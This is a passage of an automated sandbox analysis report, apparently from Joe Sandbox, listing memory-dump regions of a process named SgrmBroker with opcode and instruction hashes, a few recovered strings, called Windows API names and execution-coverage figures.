                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8261c4a2f750e428e2f930d2c007754a524de46709e3be59b675f7b049120cf2
                                      • Instruction ID: ab6b9d9411bede55ed861fd315a2a6c12c394fdf0f469b31573e9d15f1f1c14c
                                      • Opcode Fuzzy Hash: 8261c4a2f750e428e2f930d2c007754a524de46709e3be59b675f7b049120cf2
                                      • Instruction Fuzzy Hash: 9E31CF34E09A4D8FDB51EBA8C8506EDBFF0FF1A315F0401B6E158E7292DA38A945CB50
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 52240373fb5c8cc08a4f1ae22f09876df31d749a5010ef138fc691cb29cd0241
                                      • Instruction ID: eabe1d0f0dcfed359c502db32d44855be9e9667953e733c234baa19ad8d5e565
                                      • Opcode Fuzzy Hash: 52240373fb5c8cc08a4f1ae22f09876df31d749a5010ef138fc691cb29cd0241
                                      • Instruction Fuzzy Hash: 48211731A18A4D9FDF90EF98D895AEDBBF1FF69315F144166E508E3251CB34A8508B80
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6d589180f7032af1d10962e9018f6578b2eda686b08f4cfbe134ca9cbcf7ad62
                                      • Instruction ID: 7a7bb7b689452b94ad07a1e9bcc4dbcda818e2685e946cffc46222890c568e66
                                      • Opcode Fuzzy Hash: 6d589180f7032af1d10962e9018f6578b2eda686b08f4cfbe134ca9cbcf7ad62
                                      • Instruction Fuzzy Hash: 05F0E235D5C24D4FE761EBA488A92E8BFE0FF06304F9544FAD908D2082DA395504C741

                                      Execution Graph

                                      Execution Coverage:14.3%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:46
                                      Total number of Limit Nodes:2

                                      Control-flow Graph


                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: !Y_H$HAx4$HAx4$HAx4
                                      • API String ID: 0-1732287044

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD34902000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34902000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34902000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: G_H$G_H
                                      • API String ID: 0-2928901359

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: !Y_H$HAx4
                                      • API String ID: 0-3533136470

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: CreateFileTransacted
                                      • String ID:
                                      • API String ID: 2149338676-0

                                      Control-flow Graph


                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348FF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348FF000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348ff000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348FF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348FF000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348ff000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348FF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348FF000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348ff000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348FF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348FF000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348ff000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Instruction Fuzzy Hash: A4F1D130A08A5D8FDB90EF68C490BA97BF0FF6A300F1441A9E50DD7291DB38E995DB50
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bd8e3c2eed52dc22d3ca7e918190e48e88162662d6672e0c733a4b3e9f910b88
                                      • Instruction ID: d6eb63794958299ce7e2a5bd946cd9a01c588135d29e8c8fcb98add976f22649
                                      • Opcode Fuzzy Hash: bd8e3c2eed52dc22d3ca7e918190e48e88162662d6672e0c733a4b3e9f910b88
                                      • Instruction Fuzzy Hash: 55C19134A18A4D8FDB94EF98C8A57EDBBB1FF59314F50457AD40DE3292CA39A841CB40
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aa0f6071ad84a40143402c3e493601951d6ad1fcc725e148b7537140c053c273
                                      • Instruction ID: a927284255ccbb48e771bdd0aa74e65ec0aec33451a1d0b80c51e770b521e3e3
                                      • Opcode Fuzzy Hash: aa0f6071ad84a40143402c3e493601951d6ad1fcc725e148b7537140c053c273
                                      • Instruction Fuzzy Hash: 2681C872A4DA894FEBA4DF98DC656B97BF0FF5A304F1440BAD448D7193CA38A941C740
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6872137cce2a5d52e983ec1d7920806ab511858c46be1fc7cc7f68d79b528c74
                                      • Instruction ID: d5a3854b0fc2315b128c3c2ff111b9560dd319de2c4f040f4191bdb1e28aedf5
                                      • Opcode Fuzzy Hash: 6872137cce2a5d52e983ec1d7920806ab511858c46be1fc7cc7f68d79b528c74
                                      • Instruction Fuzzy Hash: 4B910C30A1890E8FDF98EF58C4A5EAA77E1FF69300F144569E509D72A5CB34EC95CB80
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d054638e2b6324df6a38d2c8887ad7ce56e978b69aadb10bbd53026f0f160b95
                                      • Instruction ID: 487d728f71e0dc8591e4272d425b10ef9c23901d3643a7b77384bca4a74c0866
                                      • Opcode Fuzzy Hash: d054638e2b6324df6a38d2c8887ad7ce56e978b69aadb10bbd53026f0f160b95
                                      • Instruction Fuzzy Hash: 58711730A18A0D8FDF48EF59D496DA977E1FF69B00F404269E506D72A5CE34F881CB85
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 971324294f12bdd96e38267eb65e8c7c3aafebcdfb4d68169627898d5ba96fea
                                      • Instruction ID: 9aebad1bad8e603070500f10357f4b071d00534f79ab1cb4b1bec34e38b22e39
                                      • Opcode Fuzzy Hash: 971324294f12bdd96e38267eb65e8c7c3aafebcdfb4d68169627898d5ba96fea
                                      • Instruction Fuzzy Hash: E361C23191C68D8FDB95DFA4C8A46E97BB0FF16304F0441BAE458D3192CB78A954C781
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 96e4aca5c6465ea3974b12f33e387326b87781aeba88223cbd3924c3bd37e8a2
                                      • Instruction ID: 36abfe05690d499391aa7a118c035d2daea8cbe55c37a63f3bcbf8053da72ded
                                      • Opcode Fuzzy Hash: 96e4aca5c6465ea3974b12f33e387326b87781aeba88223cbd3924c3bd37e8a2
                                      • Instruction Fuzzy Hash: F861CA34A08A5D8FDF94DF58C894BE97BB1FF69311F508266D40CE3255CB34A885CB80
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b604fcfec72ebabfd04b47254d402868478729680665615b76d863b2c967ca4f
                                      • Instruction ID: f54c083a26cb6d8a902044688aaae6b6c87122fee7a025a763dc024aaf099a71
                                      • Opcode Fuzzy Hash: b604fcfec72ebabfd04b47254d402868478729680665615b76d863b2c967ca4f
                                      • Instruction Fuzzy Hash: 51611B70E085198FEBA4EB58C8E9AA9B7B1FF55305F1041B9D50DE32A1DF38AD819F40
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fb84d1562997475dceafdeac1ee5962e3bde6ed755089234212e4df048b1a673
                                      • Instruction ID: 9a662fa0c36ee86b06c32f2bebe223c0e2f97fdee41afe3118b223ac59e8477f
                                      • Opcode Fuzzy Hash: fb84d1562997475dceafdeac1ee5962e3bde6ed755089234212e4df048b1a673
                                      • Instruction Fuzzy Hash: BE519131A0868D8FDBA5DF54CC91AE97BB0FF5A308F5441FAD44DD7282CA38A945CB81
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7e027bb160a59f3768db1cd484f8fb9a1294e6718579b4e65c9087c909da14aa
                                      • Instruction ID: 87f36049fbccece5d89107244df235f569202aadb6800781d6e05ee47dd0e4d6
                                      • Opcode Fuzzy Hash: 7e027bb160a59f3768db1cd484f8fb9a1294e6718579b4e65c9087c909da14aa
                                      • Instruction Fuzzy Hash: 9E51C331A1864E8FDB95DF94C8A46EEBBF0FF59304F1441BAE458D3192CB78A954CB80
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cb207520b047d153eaa3517c762fddd9a6256cbceb8f20284ab2668b594eb493
                                      • Instruction ID: 8e10d5a9c4de9da5aef3371d367ece0f9b08ad11b46726a7d8fc09b7cfe105db
                                      • Opcode Fuzzy Hash: cb207520b047d153eaa3517c762fddd9a6256cbceb8f20284ab2668b594eb493
                                      • Instruction Fuzzy Hash: EC41B231A1DA5D8FDB91DBA8D8A56E97BF0FF5A310F0400BAD508E3192CA285841C790
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 033b30967c059ffa01e6c9d38cd7d4bea87fe86a87b8a9a2434b929bc088c92b
                                      • Instruction ID: dff2ab16675ca410d8d40a23d7e26de956ebe18086beed66667b8a8fc37733b9
                                      • Opcode Fuzzy Hash: 033b30967c059ffa01e6c9d38cd7d4bea87fe86a87b8a9a2434b929bc088c92b
                                      • Instruction Fuzzy Hash: D9519134A1892D8FDBA4EB58C895BE8B7B1FB69305F5044E9910DE3251CB74AEC0CF40
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eea3557426ace51d9105f61cb782bf4579a388ff704b61df9ebf4a83352e05de
                                      • Instruction ID: 9616ad10ed05466debdd502ecbb58fcad7658d8274f0c24ec7802bf6a8d0addc
                                      • Opcode Fuzzy Hash: eea3557426ace51d9105f61cb782bf4579a388ff704b61df9ebf4a83352e05de
                                      • Instruction Fuzzy Hash: 24413A30A0850E8FDF98EF58D4A0AEE73B1FF59304F140469D51AD7285CB75E891CB90
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8261c4a2f750e428e2f930d2c007754a524de46709e3be59b675f7b049120cf2
                                      • Instruction ID: ab6b9d9411bede55ed861fd315a2a6c12c394fdf0f469b31573e9d15f1f1c14c
                                      • Opcode Fuzzy Hash: 8261c4a2f750e428e2f930d2c007754a524de46709e3be59b675f7b049120cf2
                                      • Instruction Fuzzy Hash: 9E31CF34E09A4D8FDB51EBA8C8506EDBFF0FF1A315F0401B6E158E7292DA38A945CB50
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1777732bcd18ee48e494eee36aeeb393933f4e74a84ccddb1f62187df98b8dc6
                                      • Instruction ID: e5a40b306c89de739b2ae548337f9b9a6e7e5c8bc27a040730a573ea2f40eb79
                                      • Opcode Fuzzy Hash: 1777732bcd18ee48e494eee36aeeb393933f4e74a84ccddb1f62187df98b8dc6
                                      • Instruction Fuzzy Hash: FA316C31E09A4E8FDB94DF58C8A56FE7BB1FF59311F44047AE509E3291CA78A850CB90
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1cc4062a1d8db67f03ee0a8a74bfb09ba7b5e7fc9b86ea0052d22269fab211d9
                                      • Instruction ID: e0ed100214c2c988b3d7b837b5dd4009dc036b762c4105706d310dd2f5bb1962
                                      • Opcode Fuzzy Hash: 1cc4062a1d8db67f03ee0a8a74bfb09ba7b5e7fc9b86ea0052d22269fab211d9
                                      • Instruction Fuzzy Hash: 7F311734A1454E8FDB84EF28C495AAA77A1FF59304F1086A5E81DC3285CB38E991DBC0
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a6fc4355b8558a5f5437d5eb8f8d2b92f7e052a0fa79ed03d3bffb580131b11d
                                      • Instruction ID: 4f022d71ddfc01ce2efece710713a6d2d57464dbd9eec2f976129e8b1501220a
                                      • Opcode Fuzzy Hash: a6fc4355b8558a5f5437d5eb8f8d2b92f7e052a0fa79ed03d3bffb580131b11d
                                      • Instruction Fuzzy Hash: 53213931A0891E8FCF84EF58D491AFE7BF1FF69301F00006AE519E3291CA75A961DB90
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5212ae5220101f96d2340cb823a81db7855219dc049ba1baac8c4af2bd9b9f0d
                                      • Instruction ID: 27c2bfd9e72e8ce9fffe585318eec67c94e4ab253f24393fd3ab23eeffad8f97
                                      • Opcode Fuzzy Hash: 5212ae5220101f96d2340cb823a81db7855219dc049ba1baac8c4af2bd9b9f0d
                                      • Instruction Fuzzy Hash: BE218034A18A4E9FDB84EF18C895AE97BE1FF55300F4046B5E518C7296DF78E851C780
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD34902000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34902000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34902000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2f560088a8ca7ea5dab170e94d2fdc61415fd5dd7182e2bb669000a28309fa0f
                                      • Instruction ID: ae08e607725d3aa36c5257d294fb8193c5eb1560633481958c2318d78e59ee0b
                                      • Opcode Fuzzy Hash: 2f560088a8ca7ea5dab170e94d2fdc61415fd5dd7182e2bb669000a28309fa0f
                                      • Instruction Fuzzy Hash: 9221AF35E0D6598FDB55DF64D8A02F977B0FF46310F00007AD159E3291CA7C6955DBA0
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD34902000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34902000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34902000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 20f9fc551a0bf4d10b0eff045cc9571a7e6d0adbe8dcfbc895af8e1e683d562e
                                      • Instruction ID: b446af117d9d6a13a6792d433eb3f50f857c124e35682567e11acc2c52227823
                                      • Opcode Fuzzy Hash: 20f9fc551a0bf4d10b0eff045cc9571a7e6d0adbe8dcfbc895af8e1e683d562e
                                      • Instruction Fuzzy Hash: B601A735E0C61D8EDB25AB108462AFDB370FF56300F0012BDC54E96086DE3C2598DBA1
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD34902000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34902000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34902000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: afdcf958f5f00c262708c4105f98c21173ab48625ac5e3512e1a32ef7640e699
                                      • Instruction ID: 670fe17cbaca49bdcb161a73dd503124353b584b52b57386d8215641044b6844
                                      • Opcode Fuzzy Hash: afdcf958f5f00c262708c4105f98c21173ab48625ac5e3512e1a32ef7640e699
                                      • Instruction Fuzzy Hash: BDF0BE3180D64D8FDB55EF2888922E93FA0FF16310F4541BAD908CA182DB799964C781
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dcee9bdb29559cea35d0ccc65420875a26161ad09e61eea67031abde657da284
                                      • Instruction ID: 39fc3344f6a1e89afb14c89a2a69209b30b3aa1e6cb140eb069cd973f63e4907
                                      • Opcode Fuzzy Hash: dcee9bdb29559cea35d0ccc65420875a26161ad09e61eea67031abde657da284
                                      • Instruction Fuzzy Hash: 51E0E53590D78D4FE7669F1488A22E93F50FF07310F0501BAD618C60C3DB6DA554D752
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD34902000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34902000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34902000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 180368a72578ab241be5eaefc96d1d4b58d41327fdfd54e7b13800230e36cc56
                                      • Instruction ID: 1c08c597005ade279f9517b4e48c5b6c6cb17b0479df9d32a405f594fc74fac1
                                      • Opcode Fuzzy Hash: 180368a72578ab241be5eaefc96d1d4b58d41327fdfd54e7b13800230e36cc56
                                      • Instruction Fuzzy Hash: 86F0F835E0852D8EDB64DB55D8A1BFDB3B0FF5A300F4011BAC14EE2185CEB86A949F50
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6763a407c398e988c13b853e9588db8ba2100f89ef0c4f057480d438f3465965
                                      • Instruction ID: aeb5a52ff97b9080b7769c1c60e50dd7deb9317d7edab13d36f1d9a0af4121d3
                                      • Opcode Fuzzy Hash: 6763a407c398e988c13b853e9588db8ba2100f89ef0c4f057480d438f3465965
                                      • Instruction Fuzzy Hash: A7F0E235D5C24C4FD761EBA488A92E8BFE0FF06304F9540FAD908D2192DA395504C741